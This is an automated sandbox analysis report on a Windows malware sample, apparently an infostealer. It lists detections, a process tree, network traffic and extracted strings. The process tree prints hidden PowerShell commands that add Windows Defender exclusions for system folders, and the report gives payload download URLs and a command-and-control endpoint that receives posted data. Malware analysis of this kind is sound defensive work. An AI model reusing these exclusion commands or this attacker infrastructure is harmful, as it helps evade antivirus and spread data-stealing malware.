Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
UBONg7lmVR.exe

Overview

General Information

Sample name:UBONg7lmVR.exe
renamed because original name is a hash value
Original sample name:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e.exe
Analysis ID:1499702
MD5:d2db9a159617250a517f9d074ab8f947
SHA1:cdc8efcd77ce4725200f29b9be43dac308a139a1
SHA256:e1653e127b026feeb94faf95ccc260c4b063e2e3bb4f1cc361a4f9d8e928ae6e
Tags:45-125-66-18exe
Infos:

Detection

Score:75
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UBONg7lmVR.exe (PID: 2924 cmdline: "C:\Users\user\Desktop\UBONg7lmVR.exe" MD5: D2DB9A159617250A517F9D074AB8F947)
    • tfi0ts5v.qpg.exe (PID: 320 cmdline: "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe" MD5: A499C507987982C951093E21DF0C0D96)
      • powershell.exe (PID: 2752 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4816 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2000 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6208 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5492 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3116 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4768 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • rapnewsa.exe (PID: 6420 cmdline: C:\Reka\rapnewsa.exe MD5: 2D4E723C184D9403B078E53F2DE74A23)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe, ParentProcessId: 320, ParentProcessName: tfi0ts5v.qpg.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 2752, ProcessName: powershell.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe, ParentProcessId: 320, ParentProcessName: tfi0ts5v.qpg.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 2752, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exe, ParentProcessId: 320, ParentProcessName: tfi0ts5v.qpg.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 2752, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: C:\Reka\rapnewsa.exeAvira: detection malicious, Label: HEUR/AGEN.1315917
Source: C:\Reka\rapnewsa.exeReversingLabs: Detection: 15%
Source: C:\Reka\rapnewsa.exeVirustotal: Detection: 24%Perma Link
Source: C:\Users\user\AppData\Local\Temp\tfi0ts5v.qpg.exeVirustotal: Detection: 8%Perma Link
Source: UBONg7lmVR.exeVirustotal: Detection: 13%Perma Link
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Reka\rapnewsa.exeJoe Sandbox ML: detected
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00231000 CryptUnprotectData,20_2_00231000
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00231C40 CryptSignHashA,CryptUpdateProtectedState,WinHttpTimeFromSystemTime,20_2_00231C40
Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.216.214.209:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: UBONg7lmVR.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00238D40 FindFirstFileW,FindNextFileW,FindClose,20_2_00238D40
Source: global trafficHTTP traffic detected: GET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBSRNVB4O&Signature=OlwE0Z7zZ9D5y5awFM9ze3uDdNQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDYfd%2BUjJB69jUrDiyn1ACmAHX7h00Ms9jdu77V8%2BbQiQIgZpc%2BMuqfuYdaGno1Dsx%2B7%2F1fwCn7flbDkj2a%2BGAQysgqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDD4%2BkCpT2xQmd8KInCqEAvZwZorvFr4FTztBPDZNc9pDNqkH8vr7IuwfigaQALQGTrPZ0n7R7G8mqGRWhz4oaHR4A8Ys2xjzqZGWPRpx0BFDyTjkmyoax2AaGjEDU5jLO%2BI9eW7cP4cukvQKbCyWWaT5nH2nOvfjMtwrY7mMwVVTiar%2B39%2Byq5c%2B9nWv%2B%2FPilmtLMfv8xN8csgfCaXMfzMODVnTCTrFl761VH1766hS%2B5Cnh8uVySF0REGckmSLzCJ%2F0ZEYpa5suMbY8vBrSg7MNEaMobmU8RJEsTH84YYV9rPdjJvJZV5WyDYDN%2F9UJkRyE%2B75nvJfPzPEsxIOsO9LaiYwGWgye6WWMhiJmt%2FDDxtgtMIzctrYGOp0Bw0hHLf7CiJ1Ipvl%2FLmwUS8fG9wj2hiSRqVvcq7rKCQJfS2sjcFo0U551qCcKaGgnV0%2BuJkrF%2B5QqVA9lRII9%2B31TsHrG000N%2BnH3LKfIQS48cfIAiUtpWMew1%2FMMH%2Baw%2Fj57s8x1nLC7uDHr7YiJQqBA%2FwOszYvifoedrG%2BdmOMwGjA7Ud8zT1Ja0%2FZyvtW6%2BEBZTglVxH9fgZisGw%3D%3D&Expires=1724757268 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.166.143.48 185.166.143.48
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewIP Address: 140.82.121.3 140.82.121.3
Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownTCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /updated24/updated24/downloads/Updated11.12.exe HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-4f05-aba3-c7f453357584/Updated11.12.exe?response-content-disposition=attachment%3B%20filename%3D%22Updated11.12.exe%22&AWSAccessKeyId=ASIA6KOSE3BNBSRNVB4O&Signature=OlwE0Z7zZ9D5y5awFM9ze3uDdNQ%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEPv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIQDYfd%2BUjJB69jUrDiyn1ACmAHX7h00Ms9jdu77V8%2BbQiQIgZpc%2BMuqfuYdaGno1Dsx%2B7%2F1fwCn7flbDkj2a%2BGAQysgqpwIIFBAAGgw5ODQ1MjUxMDExNDYiDD4%2BkCpT2xQmd8KInCqEAvZwZorvFr4FTztBPDZNc9pDNqkH8vr7IuwfigaQALQGTrPZ0n7R7G8mqGRWhz4oaHR4A8Ys2xjzqZGWPRpx0BFDyTjkmyoax2AaGjEDU5jLO%2BI9eW7cP4cukvQKbCyWWaT5nH2nOvfjMtwrY7mMwVVTiar%2B39%2Byq5c%2B9nWv%2B%2FPilmtLMfv8xN8csgfCaXMfzMODVnTCTrFl761VH1766hS%2B5Cnh8uVySF0REGckmSLzCJ%2F0ZEYpa5suMbY8vBrSg7MNEaMobmU8RJEsTH84YYV9rPdjJvJZV5WyDYDN%2F9UJkRyE%2B75nvJfPzPEsxIOsO9LaiYwGWgye6WWMhiJmt%2FDDxtgtMIzctrYGOp0Bw0hHLf7CiJ1Ipvl%2FLmwUS8fG9wj2hiSRqVvcq7rKCQJfS2sjcFo0U551qCcKaGgnV0%2BuJkrF%2B5QqVA9lRII9%2B31TsHrG000N%2BnH3LKfIQS48cfIAiUtpWMew1%2FMMH%2Baw%2Fj57s8x1nLC7uDHr7YiJQqBA%2FwOszYvifoedrG%2BdmOMwGjA7Ud8zT1Ja0%2FZyvtW6%2BEBZTglVxH9fgZisGw%3D%3D&Expires=1724757268 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/nepipirusas.json HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1Host: github.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /workhasf/kelm/main/iconozave.exe HTTP/1.1Host: raw.githubusercontent.comUser-Agent: Go-http-client/1.1Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exeAccept-Encoding: gzip
Source: global trafficHTTP traffic detected: GET /get HTTP/1.1Host: httpbin.orgUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global trafficDNS traffic detected: DNS query: bitbucket.org
Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: github.com
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: unknownHTTP traffic detected: POST /api/receiver/recv HTTP/1.1Connection: Keep-AliveContent-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48Content-Length: 3160Host: 45.125.66.18
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.com
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bbuseruploads.s3.amazonaws.comd
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.org
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bitbucket.orgd
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.com
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s3-w.us-east-1.amazonaws.comd
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rapnewsa.exe, 00000014.00000002.2541747512.000000000168E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/api/receiver/recv
Source: rapnewsa.exe, 00000014.00000002.2541747512.00000000016BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18/li
Source: rapnewsa.exe, 00000014.00000002.2541747512.000000000168E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://45.125.66.18:443/api/receiver/recv
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/5b13bdbb-293e-4709-86cb-a1785eabdee3/downloads/f3e97ed3-319a-
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org
Source: UBONg7lmVR.exeString found in binary or memory: https://bitbucket.org/updated24/updated24/downloads/Updated11.12.exe
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
Source: tfi0ts5v.qpg.exe, 00000003.00000002.2560453979.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com
Source: tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C000224000.00000004.00001000.00020000.00000000.sdmp, tfi0ts5v.qpg.exe, 00000003.00000002.2561321553.000000C000108000.00000004.00001000.00020000.00000000.sdmp, tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C00024E000.00000004.00001000.00020000.00000000.sdmp, tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C00025C000.00000004.00001000.00020000.00000000.sdmp, tfi0ts5v.qpg.exe, 00000003.00000002.2561321553.000000C0001A2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exe
Source: tfi0ts5v.qpg.exe, 00000003.00000002.2561321553.000000C000108000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exeC:
Source: tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C00024E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.com66666666666666666666
Source: tfi0ts5v.qpg.exe, 00000003.00000002.2560453979.000000C00000E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.comgithubusercontent.com
Source: tfi0ts5v.qpg.exe, 00000003.00000002.2560453979.000000C000056000.00000004.00001000.00020000.00000000.sdmp, tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C000234000.00000004.00001000.00020000.00000000.sdmp, tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C000240000.00000004.00001000.00020000.00000000.sdmp, tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C000208000.00000004.00001000.00020000.00000000.sdmp, tfi0ts5v.qpg.exe, 00000003.00000002.2561321553.000000C0001E8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/get
Source: tfi0ts5v.qpg.exe, 00000003.00000002.2562357900.000000C00024A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D7A000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D76000.00000004.00000800.00020000.00000000.sdmp, UBONg7lmVR.exe, 00000000.00000002.4506017907.0000000005D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownHTTPS traffic detected: 185.166.143.48:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.216.214.209:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: UBONg7lmVR.exe, 00000000.00000002.4506869236.0000000006CC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine need more dataREQUEST_METHODunreachable: RCodeNameErrorResourceHeadermime/multipartdata truncatednew_example.txtStatus code: %dstatus code: %dnegative updateaccept-encodingaccept-languagex-forwarded-forAccept-Encodingrecv_rststream_Idempotency-KeyPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keywrite error: %wGetProcessTimesDuplicateHandleadvertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDeviceIoControlFlushViewOfFileGetCommandLineWGetStartupInfoWProcess32FirstWUnmapViewOfFileFailed to load Failed to find : cannot parse ,M3.2.0,M11.1.0ExcludeClipRectGetEnhMetaFileWGetTextMetricsWPlayEnhMetaFileGdiplusShutdownGetThreadLocaleOleUninitializewglGetCurrentDCDragAcceptFilesCallWindowProcWCreatePopupMenuCreateWindowExWDialogBoxParamWGetActiveWindowGetDpiForWindowGetMonitorInfoWGetRawInputDataInsertMenuItemWIsWindowEnabledIsWindowVisiblePostQuitMessageSetActiveWindowSetWinEventHookTrackMouseEventWindowFromPointDrawThemeTextExGetSecurityInfoImpersonateSelfOpenThreadTokenSetSecurityInfoAddDllDirectoryFindNextVolumeWFindVolumeCloseGetCommTimeoutsIsWow64Process2QueryDosDeviceWSetCommTimeoutsSetVolumeLabelWRtlDefaultNpAclCLSIDFromStringStringFromGUID2IsWindowUnicodetimeBeginPeriodinvalid argSize<invalid Value>476837158203125record overflowbad certificatePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512ClientAuthType(unknown versionAccept-LanguageX-Forwarded-Formissing address/etc/mdns.allowunknown network()<>@,;:\"/[]?=allocmRInternalwrite heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockmalloc deadlockruntime error: elem size wrong with GC progmemstr_92c2e3ad-8
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00231470 NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,GetFileType,CloseHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,20_2_00231470
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00233D50 NtClose,NtClose,20_2_00233D50
Source: C:\Reka\rapnewsa.exeCode function: 20_2_00231610 NtQueryObject,NtQueryObject,20_2_00231610
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_07D24FE00_2_07D24FE0
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_07D245BC0_2_07D245BC
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099B83E80_2_099B83E8
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099B0F080_2_099B0F08
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099B0F030_2_099B0F03
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099B83CD0_2_099B83CD
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099B05480_2_099B0548
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099F9AF00_2_099F9AF0
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_099F9AE00_2_099F9AE0
Source: C:\Users\user\Desktop\UBONg7lmVR.exeCode function: 0_2_154183C80_2_154183C8
